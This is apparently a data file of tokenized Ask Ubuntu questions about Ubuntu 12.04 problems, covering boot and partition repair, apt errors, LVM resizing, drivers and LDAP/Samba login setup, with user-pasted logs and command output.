191364	tweaking user privileges ubuntu 12.04	i would like to fine tune user privileges after reviewing default available privileges for a standard user . is there a way to fine tune it ? i was using 10.04 and 10.10 until now and i could not find advanced settings in users screen in 12.04 . i saw an older question here and want to confirm if this is still the right way for 12.04 or is there a better way ?
191368	how to repair partition table ?	i have a dual boot computer with windows 7 and ubuntu on it . recently , i was working in windows7 and my flash had crashed , the computer rebooted to error : partition not found . grub rescue > i had made a ubuntu live cd and attempted at fixing it with lilo , i managed to get grub to work , but i was n't able to boot up windows . i went back into live and did sudo apt-get install syslinux ; sudo dd if=/usr/lib/syslinux/mbr.bin of=/dev/sda . i did the same again after rebooting into windows7 had failed since it was complaining about not being able to load the kernel . i had done it on sda2 and i reboot to see that it said the os is missing . now , i did sudo fdisk -lu and i got the following : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe635605c device boot start end blocks id system /dev/sda1 0 0 0 6 fat16 /dev/sda2 * 2048 206847 102400 de dell utility /dev/sda3 206848 20686847 10240000 7 hpfs/ntfs/exfat /dev/sda4 20686848 143566847 61440000 7 hpfs/ntfs/exfat i am sure sda1 was not like that ... and i ca n't do cfdisk . it 's giving me this error : fatal error : bad primary partition 1 : partition ends before sector 0 help ? ?
191373	problem in apt-get update - ubuntu 12.04 ?	how to resolve the following error message ? error message : w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) /dists/precise/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) /dists/precise/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead .
191376	how to enable systray pidgin icon in notification area in 12.04 and nouveau ?	the suggested solution : run dconf-editor open desktop - > unity - > panel set systray-whitelist to `` [ 'all ' ] '' does n't work for nouveau . where i have nvidia propetriary driver icon appeared normally ...
191378	mac os x roaming profile from samba with openldap backend on ubuntu 11.10	i have been battling for a week now to get my mac ( mountain lion ) to authenticate on my home network 's openldap and samba . from several sources , like the ubuntu community docs , and other blogs , and after a hell of a lot of trial and error and piecing things together , i have created a samba.ldif that will pass the smbldap-populate when combined with apple.ldif and i have a fully functional openldap server and a samba pdc that uses ldap to authenticate the os x machine . the problem is that when i login , the home directory is not created or pulled from the server . i get the following in system.log sep 21 06:09:15 sams-macbook-pro.local securityagent [ 265 ] : user info context values set for sam sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : got user : sam sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : got ruser : ( null ) sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : got service : authorization sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in od_principal_for_user ( ) : no authauth availale for user . sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in od_principal_for_user ( ) : failed : 7 sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : failed to determine kerberos principal name . sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : done cleanup3 sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : kerberos 5 refuses you sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_authenticate ( ) : pam_sm_authenticate : ntlm sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_acct_mgmt ( ) : opendirectory - membership cache ttl set to 1800 . sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in od_record_check_pwpolicy ( ) : retval : 0 sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_setcred ( ) : establishing credentials sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_setcred ( ) : got user : sam sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_setcred ( ) : context initialised sep 21 06:09:15 sams-macbook-pro.local authorizationhost [ 270 ] : in pam_sm_setcred ( ) : pam_sm_setcred : ntlm user sam does n't have auth authority all that 's great and good and i authenticate . then i get cfpreferences : user home directory for user kcfpreferencescurrentuser at /network/servers/172.17.148.186/home/sam is unavailable . user domains will be volatile . failed looking up user domain root ; url='file : //localhost/network/servers/172.17.148.186/home/sam/' path=/network/servers/172.17.148.186/home/sam/ err=-43 uid=9000 euid=9000 if you 're wondering where /network/servers/ip/home/sam comes from , it 's from a couple of blogs that said the openldap attribute apple-user-homedirectory should have that value and the nfshomedirectory on the mac should point to apple-user-homedirectory i also set the attr apple-user-homeurl to < home_dir > < url > smb : //172.17.148.186/sam/ < /url > < path > < /path > < /home_dir > which i found on this forum . any help is appreciated , because i 'm banging my head against the wall at this point . by the way , i intend to create a blog on my vps just for this , and create an install script in python that people can download so no one has to go through what i 've had to go through this week : ) after some sleep i am going to try to login from a windows machine and report back here . thanks sam
191380	how to start making a non-free application ?	i am wondering how is it possible somebody to make a non-free application under ubuntu . being an open-source programmer , i 've found that in order to make even the simplest program i use libraries that are open source and thus , i can legally use them only if my program is going to be free and open source . so , i wonder , in order to develop a non-free application you require to write all the libraries you are going to use yourself and you can not have open source dependencies etc ?
191383	how to get videos on yahoo finance to play	until a few months ago , these videos played ok in firefox and opera . then they stopped playing in firefox now they do n't play at all . any ideas for a fix ?
191384	how do i fix a broken package system ?	i have the following problem : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f the following packages have unmet dependencies : chromium-browser-l10n : depends : chromium-browser ( = 20.0.1132.47~r144678-0ubuntu0.12.04.1 ) but 18.0.1025.168~r134367-0ubuntu0.12.04.1 is installed '' any suggestions ?
191385	graphical error on moving from 11.10 to 12.04	i was on ubuntu 11.10 , i have tried to update the os to 12.04 ( with 12.04.1 version ) . all has worked , except the fact that when i reboot : i stay blocked on the loading page i can access the consol mode ( ctrl-alt-f1 ) if i try to restart the graphic interface , it freezes completely , but it appears ( no more keyboard , no mouse ) thank you for your help !
191389	ubuntu server takes time to resolve website name but not ip address in wget command	i have ubuntu server 12.04 lts . when i fetch something over the internet using wget command . it easily starts when i give address like wget 100.100.100.100/index.html means ip address . it immediately start downloading that thing . but if i use wget www.google.com/index.html it takes almost 10-15 seconds to resolve . i think the problem is with dns . it is resolving too late . can anyone help me what can be the problem . my server is behind router and on nat .
191390	how to use sudo command to install .tar.gz ?	i am newbie to ubuntu . i would like someone to explain how to use sudo command to unzip & install .tar.gz file to me .
191396	i am not able to boot into window 7 after ubuntu 12.04 installation	not able to boot into window 7 . i am naive in ubuntu usage . pls guide immediately . the following link a got after boot repair . http : //paste.ubuntu.com/1218634/ full message is as follows : you can now reboot your computer . please do not forget to make your bios boot on sda ( 500gb ) disk ! the boot files of [ the os now in use - ubuntu 12.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition )
191398	firefox 15 hangs with ubuntu kernel update	i recently ran updates and it told me that in order to get those updates i had to update my kernel . i did that and also updated firefox to 15 . since then firefox hangs/gray screens sites i go to . this lasts anywhere from 5-10 seconds to 2-3 minutes . i have restarted firefox with all add-ons disabled but it still did the same thing . i found a bug report on launchpad that sounded like what was happening with me , but i have n't received any error codes , just the hanging/frozen screens . also it seems that it ups my cpu making the rest of ubuntu lag while firefox is hung . i would guess the cause is a conflict between the updated kernel and the updated firefox , but i 'm still fairly new at ubuntu and not sure where to go from here . is there anything else to try ? my toshiba laptop specs are : ubuntu 12.04 ( 32 bit ) linux 3.2.0-30-generic-pae # 48-ubuntu smp fri aug 24 17:14:09 utc 2012 i686 i686 i386 gnu/linux firefox 15.0.1 intel® pentium ( r ) dual cpu t3400 @ 2.16ghz × 2 mobile intel® gm45 express chipset x86/mmx/sse2 thanks !
191400	does the latest version of ubuntu ( 12.04 ) support unity 3d ?	i just installed the latest version of ubuntu ( 12.04 ) 64bit . i am using a radeon hd 7750 vid card . i think i have the catalyst driver installed correctly . but when i go to system and look at the details , it shows that my graphics is vesa:01 . does this mean i it , i did n't correctly install my driver ? system specs : mb : asus p7p55-m cpu : intel i5 quad core mem : 4gb dd3 vc : his radeon hd 7750 ( 1gb ddr5 ) thanks for help .
191401	not enough space left in the hard drive . how to proceed ?	where do i begin ... i can hardly do anything on ubuntu 12.04 . i am very close to removing and returning to windows . first i could not load it because the graphics appeared to be running low but somehow that stopped happening and i could log on . now i can not download anything or i get this message can not write : no space left on device . i tried trouble shooting this issue but every time i try and fix the problem i am blocked by this message e : write error - write ( 28 : no space left on device ) e : ca n't mmap an empty file e : failed to truncate file - ftruncate ( 9 : bad file descriptor ) e : the package lists or status file could not be parsed or opened . $ old= $ ( ls -tr /boot/vmlinuz-* | head -n -2 | cut -d- -f2- | awk ' { print `` linux-image- '' $ 0 } ' ) ubuntu is also running incredibly slow and i cant get anything done ! please help this is driving me mad !
191402	how to configure micromax 352g modem in 12.04	i am using micromax 352g modem for internet purpose and using tata docomo sim in it . the problem that i am facing right now is not able to access internet in ubuntu 12.04 lts with my modem . i have tried almost all tricks but failed to succeed . please help me out .
191403	sometimes , strange audio distortion ( peeping , scratching ) , ubuntu 12.04	i have a problem with my sound in ubuntu 12.04 ( 64bit ) . the problem is , that sometimes out of nowhere , when switching songs , or playing youtube videos , changing volume with my keyboard buttons , that the sound gets distorted ( peeping , scratching ) . i dont know if it is related , but when i skip through music in rythmbox , there is also a little scratching noise . i can sometimes temporarly fix it : for youtube videos , i refresh the page , and sometimes it works agian normal , mostly not . for audio playback with rythmbox , i have to pause the song for sometime , and resume it , and hope that it works . before all that , i have changed my soundcard to `` analog surround 5.1 '' in the sound settings from ubuntu , but i also used alsamixer to change it from 2 channels to 6 channels , since changing in ubuntu sound settings alone wasnt enough to make the other speaks work . i use a asus p8-h61-m le b3 revision motherboard . which has a built in surround soundcard . here is lshw -c multimedia output : beschreibung : audio device produkt : 6 series/c200 series chipset family high definition audio controller hersteller : intel corporation physische id : 1b bus-informationen : pci @ 0000:00:1b.0 version : 05 breite : 64 bits uhr : 33mhz f채higkeiten : pm msi pciexpress bus_master cap_list konfiguration : driver=snd_hda_intel latency=0 ressourcen : irq:43 memory : f7f00000-f7f03fff
191407	restart issues with imac and ubuntu 12.04	when i select `` restart '' with 12.04 it begins the process , then stays forever stuck on the 3rd or 4th `` dot '' with the ubuntu logo and never restarts so i do n't have a choice but to force my imac to shutdown . could n't see any report of this issue anywhere . does it ring a bell to someone ? and is there a way to fix it ?
191409	how to shut down the s/pdif output in my sound card ?	i realized that there is a red light coming out of my earphone jack . it 's something like this : http : //i.stack.imgur.com/gokuh.jpg i looked in the folder that toshiba created for installing drivers , then i found out that they had installed this driver for my sound card : realtek hd audio driver v6.0.1.5689_withmaxxaudio_compal ( 20080908 ) i 'm guessing that the sound card supports optical audio output . i also found out that when i mute the speakers , the light goes away . but when i unmute it , it comes back . i do n't really mind having it but it drains my battery . so , is there a ubuntu version for my sound card driver ?
191415	kernel panic on reboot after failed logical volume resize	i attempted to do a logical volume resize yesterday using the follwoing commands $ sudo pvdisplay `` /dev/sda8 '' is a new physical volume of `` 113.11 gib '' -- - new physical volume -- - pv name /dev/sda8 vg name pv size 113.11 gib allocatable no pe size 0 total pe 0 free pe 0 allocated pe 0 pv uuid jwyo1o-b2ap-cw51-kx7o-kf26-arim-sm8v6m $ sudo vgextend vg /dev/sda8 $ sudo vgdisplay vg -- - volume group -- - vg name vg system id format lvm2 metadata areas 2 metadata sequence no 9 vg access read/write vg status resizable max lv 0 cur lv 5 open lv 5 max pv 0 cur pv 2 act pv 2 vg size 131.74 gib pe size 4.00 mib total pe 33725 alloc pe / size 4769 / 18.63 gib free pe / size 28956 / 113.11 gib vg uuid ahusw2-pzfv-3w32-mpv2-s5vg-fn7s-kvsadx $ sudo lvresize -l +20gb /dev/mapper/vg-var so as you can see , it looks like adding the physical volume to the vg worked , because i see free space available there . when i typed the lvresize command , it never returned . i let this run overnight in the background , but this morning i still couldnt successfully do a `` pvdisplay '' or `` lvdisplay '' because i think it was waiting on a lock or something , so the command never returned . when i went to log onto the server 's console , i saw a bunch of messages like : rcu_sched_state detected stall on cpu 2 now when i boot , i get a kernel panic error , and a message about not being able to mount /mapper/vg-root can not open root device `` mapper/vg-root '' or unknown_block ( 0,0 ) kernel panic -not syncing : vfs : unable to mount root file system on unknown_block ( 0,0 ) what should i do to get my system back up and running ? did i attempt to do the logical volume resize correctly ? thanks edit : disk /dev/sda : 293.6 gb , 293563949056 bytes 255 heads , 63 sectors/track , 35690 cylinders , total 573367088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006a47a device boot start end blocks id system /dev/sda1 * 63 192779 96358+ 83 linux /dev/sda2 192780 4096574 1951897+ 83 linux /dev/sda3 4096636 573359849 284631607 5 extended /dev/sda5 4096638 43166654 19535008+ 8e linux lvm /dev/sda6 43166718 140825789 48829536 8e linux lvm /dev/sda7 140825853 336144059 97659103+ 8e linux lvm /dev/sda8 336144123 573359849 118607863+ 8e linux lvm
191418	yelp does not work right	when i click on dashhome then click on the questionmark , it brings up the help system . however when i enter a command to search on it tells me this does not exist . from what i understand the engine is yelp and is suppose to search everything including the man pages . however , i ca n't get it to find anything . i tried to install the yelp package but it tells me the one that is installed is the latest version . am i doing something wrong ? everything i read says hitting the f1 key is suppose to bring up yelp but thanks in advance . dave
191420	how to enable a startpage in shotwell ?	how do i enable a startpage in shotwell . i do n't like my photos to be shown when opening shotwell . i want it so show an image previously selected , and it should only shows my photos after clicking `` library '' .
191423	can i download music from itunes web site without itunes software ?	there is a bunch of free courses available on the net . but a lot of them are available only through itunes , even if they are free , including one that interests me . there is no way i install itunes on my computer ( not that i ca n't , but i wo n't ) . is there a workaround ( ex : user-agent ? ) to download the files anyway ?
191427	clementine skips songs on ubuntu 12.04	so i 've installed clementine and it seems to be skipping songs with an error message `` failed to parse stream '' . i 've tried amarok , but it does the same . no idea what to do here . any help would be appreciated .
191431	ubuntuone client alternative	on ubuntu 12.04 , ubuntuone client has never worked out for me . it just hangs at `` file sync starting '' everytime . i 've used all the workaround terminal commands , but nothing works . now i 'm fed up with the desktop client . is there any other way to use ubuntuone without the default client ? any other new fix appriciated ! thanks !
191432	apt problem . ca n't update ( total noob )	i am new to linux , and have n't been using ubuntu for very long . recently , whenever i try to update using the update manager , or apt-get update , i get this : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_indicator-multiload_stable-daily_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . i have tried clearing my lists folder , did n't work . i also tried changing servers , that did n't work either . please help ! i am not able to update my software . here is the full text output of sudo apt-get update ign http : //dl.google.com stable inrelease ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-security inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease ign http : //dl.google.com stable inrelease hit http : //us.archive.ubuntu.com precise release.gpg hit http : //us.archive.ubuntu.com precise-updates release.gpg hit http : //us.archive.ubuntu.com precise-security release.gpg get:1 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //us.archive.ubuntu.com precise-backports release.gpg hit http : //us.archive.ubuntu.com precise release hit http : //us.archive.ubuntu.com precise-updates release hit http : //dl.google.com stable release.gpg hit http : //us.archive.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com precise-backports release hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources get:2 http : //dl.google.com stable release hit http : //us.archive.ubuntu.com precise/restricted amd64 packages hit http : //us.archive.ubuntu.com precise/main amd64 packages hit http : //us.archive.ubuntu.com precise/universe amd64 packages hit http : //us.archive.ubuntu.com precise/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //dl.google.com stable release hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted sources hit http : //us.archive.ubuntu.com precise-updates/main sources hit http : //us.archive.ubuntu.com precise-updates/universe sources hit http : //us.archive.ubuntu.com precise-updates/multiverse sources hit http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-updates/main amd64 packages hit http : //us.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-updates/restricted i386 packages get:3 http : //dl.google.com stable/main amd64 packages [ 1,246 b ] hit http : //us.archive.ubuntu.com precise-updates/main i386 packages hit http : //us.archive.ubuntu.com precise-updates/universe i386 packages hit http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex hit http : //us.archive.ubuntu.com precise-security/restricted sources hit http : //us.archive.ubuntu.com precise-security/main sources hit http : //us.archive.ubuntu.com precise-security/universe sources hit http : //dl.google.com stable/main i386 packages ign http : //dl.google.com stable/main translationindex get:4 http : //dl.google.com stable/main amd64 packages [ 655 b ] ign http : //archive.canonical.com precise inrelease ign http : //linux.dropbox.com precise inrelease ign https : //private-ppa.launchpad.net precise inrelease ign http : //extras.ubuntu.com precise inrelease hit http : //us.archive.ubuntu.com precise-security/multiverse sources hit http : //us.archive.ubuntu.com precise-security/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-security/main amd64 packages hit http : //us.archive.ubuntu.com precise-security/universe amd64 packages hit http : //us.archive.ubuntu.com precise-security/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-security/restricted i386 packages hit http : //us.archive.ubuntu.com precise-security/main i386 packages hit http : //us.archive.ubuntu.com precise-security/universe i386 packages hit http : //us.archive.ubuntu.com precise-security/multiverse i386 packages get:5 http : //dl.google.com stable/main i386 packages [ 654 b ] hit http : //us.archive.ubuntu.com precise-security/main translationindex ign http : //dl.google.com stable/main translationindex hit http : //us.archive.ubuntu.com precise-security/multiverse translationindex hit http : //us.archive.ubuntu.com precise-security/restricted translationindex hit http : //us.archive.ubuntu.com precise-security/universe translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //us.archive.ubuntu.com precise-backports/main amd64 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //us.archive.ubuntu.com precise-backports/universe amd64 packages hit http : //us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //us.archive.ubuntu.com precise-backports/main i386 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-backports/universe i386 packages hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-security/main translation-en hit http : //archive.canonical.com precise release.gpg hit http : //us.archive.ubuntu.com precise-security/multiverse translation-en hit http : //us.archive.ubuntu.com precise-security/restricted translation-en hit http : //us.archive.ubuntu.com precise-security/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en get:6 http : //linux.dropbox.com precise release.gpg [ 489 b ] hit http : //extras.ubuntu.com precise release.gpg hit http : //us.archive.ubuntu.com precise-backports/universe translation-en ign https : //private-ppa.launchpad.net precise release.gpg hit http : //extras.ubuntu.com precise release get:7 http : //linux.dropbox.com precise release [ 2,603 b ] hit http : //packages.medibuntu.org precise inrelease ign https : //private-ppa.launchpad.net precise release hit http : //extras.ubuntu.com precise/main sources ign http : //dl.google.com stable/main translation-en_us get:8 http : //linux.dropbox.com precise/main amd64 packages [ 1,029 b ] ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //archive.canonical.com precise release get:9 http : //linux.dropbox.com precise/main i386 packages [ 1,029 b ] ign http : //linux.dropbox.com precise/main translationindex hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //packages.medibuntu.org precise/free amd64 packages ign https : //private-ppa.launchpad.net precise/main translationindex get:10 http : //ppa.launchpad.net precise inrelease [ 16.9 kb ] hit http : //packages.medibuntu.org precise/non-free amd64 packages get:11 http : //ppa.launchpad.net precise inrelease [ 16.9 kb ] ign http : //ppa.launchpad.net precise inrelease get:12 http : //ppa.launchpad.net precise inrelease [ 16.9 kb ] ign http : //ppa.launchpad.net precise inrelease get:13 http : //ppa.launchpad.net precise inrelease [ 16.9 kb ] ign http : //ppa.launchpad.net precise inrelease get:14 http : //ppa.launchpad.net precise inrelease [ 16.9 kb ] ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en ign http : //linux.dropbox.com precise/main translation-en_us ign http : //linux.dropbox.com precise/main translation-en err https : //private-ppa.launchpad.net precise/main amd64 packages gnutls_handshake ( ) failed : a tls packet with unexpected length was received . err https : //private-ppa.launchpad.net precise/main i386 packages gnutls_handshake ( ) failed : a tls packet with unexpected length was received . hit http : //ppa.launchpad.net precise/main sources/diffindex hit http : //ppa.launchpad.net precise/main amd64 packages/diffindex hit http : //ppa.launchpad.net precise/main i386 packages/diffindex get:15 http : //ppa.launchpad.net precise/main translationindex [ 16.9 kb ] hit http : //ppa.launchpad.net precise/main sources/diffindex hit http : //ppa.launchpad.net precise/main amd64 packages/diffindex hit http : //ppa.launchpad.net precise/main i386 packages/diffindex get:16 http : //ppa.launchpad.net precise/main translationindex [ 16.9 kb ] hit http : //ppa.launchpad.net precise/main sources/diffindex hit http : //ppa.launchpad.net precise/main amd64 packages/diffindex hit http : //packages.medibuntu.org precise/free i386 packages ign https : //private-ppa.launchpad.net precise/main translation-en_us ign https : //private-ppa.launchpad.net precise/main translation-en hit http : //packages.medibuntu.org precise/non-free i386 packages ign http : //packages.medibuntu.org precise/free translationindex hit http : //ppa.launchpad.net precise/main i386 packages/diffindex get:17 http : //ppa.launchpad.net precise/main translationindex [ 16.9 kb ] hit http : //ppa.launchpad.net precise/main sources/diffindex hit http : //ppa.launchpad.net precise/main amd64 packages/diffindex hit http : //ppa.launchpad.net precise/main i386 packages/diffindex get:18 http : //ppa.launchpad.net precise/main translationindex [ 16.9 kb ] get:19 http : //ppa.launchpad.net precise/main sources [ 16.9 kb ] hit http : //ppa.launchpad.net precise/main amd64 packages/diffindex hit http : //ppa.launchpad.net precise/main i386 packages/diffindex get:20 http : //ppa.launchpad.net precise/main translationindex [ 16.9 kb ] 57 % [ 19 sources bzip2 0 b ] [ connecting to packages.medibuntu.org ( 88.191.127.22 ) ] bzip2 : ( stdin ) is not a bzip2 file . ign http : //packages.medibuntu.org precise/non-free translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages 57 % [ 19 sources xz 0 b ] [ waiting for headers ] 17.7 kb/s 4s/usr/bin/xz : ( stdin ) : file format not recognized err http : //ppa.launchpad.net precise/main sources 57 % [ 19 sources lzma 0 b ] [ connecting to packages.medibuntu.org ( 88.191.127.22 ) ] 17.7 kb/s 4s/usr/bin/lzma : ( stdin ) : file format not recognized err http : //ppa.launchpad.net precise/main sources ign http : //packages.medibuntu.org precise/free translation-en_us ign http : //packages.medibuntu.org precise/free translation-en ign http : //packages.medibuntu.org precise/non-free translation-en_us ign http : //packages.medibuntu.org precise/non-free translation-en fetched 93.7 kb in 16s ( 5,705 b/s ) w : gpg error : http : //ppa.launchpad.net precise inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_indicator-multiload_stable- daily_ubuntu_dists_precise_inrelease does n't start with a clearsigned message w : gpg error : http : //ppa.launchpad.net precise inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_nvbn-rm_ppa_ubuntu_dists_precise_inrelease does n't start with a clearsigned message w : gpg error : http : //ppa.launchpad.net precise inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_ralf.hersel_rhersel-ppa_ubuntu_dists_precise_inrelease does n't start with a clearsigned message w : gpg error : http : //ppa.launchpad.net precise inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_scopes-packagers_ppa_ubuntu_dists_precise_inrelease does n't start with a clearsigned message w : gpg error : http : //ppa.launchpad.net precise inrelease : file /var/lib/apt/lists/partial/ppa.launchpad.net_tualatrix_ppa_ubuntu_dists_precise_inrelease does n't start with a clearsigned message w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa- uploaders/torchlight/ubuntu/dists/precise/main/binary-amd64/packages gnutls_handshake ( ) failed : a tls packet with unexpected length was received . w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa- uploaders/torchlight/ubuntu/dists/precise/main/binary-i386/packages gnutls_handshake ( ) failed : a tls packet with unexpected length was received . w : failed to fetch http : //ppa.launchpad.net/indicator-multiload/stable- daily/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_indicator-multiload_stable- daily_ubuntu_dists_precise_main_i18n_index w : failed to fetch http : //ppa.launchpad.net/nvbn-rm/ppa/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_nvbn-rm_ppa_ubuntu_dists_precise_main_i18n_index w : failed to fetch http : //ppa.launchpad.net/ralf.hersel/rhersel-ppa/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_ralf.hersel_rhersel-ppa_ubuntu_dists_precise_main_i18n_index w : failed to fetch http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_scopes-packagers_ppa_ubuntu_dists_precise_main_i18n_index w : failed to fetch gzip : /var/lib/apt/lists/partial/ppa.launchpad.net_tualatrix_ppa_ubuntu_dists_precise_main_source_sour ces encountered a section with no package : header w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_tualatrix_ppa_ubuntu_dists_precise_main_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead .
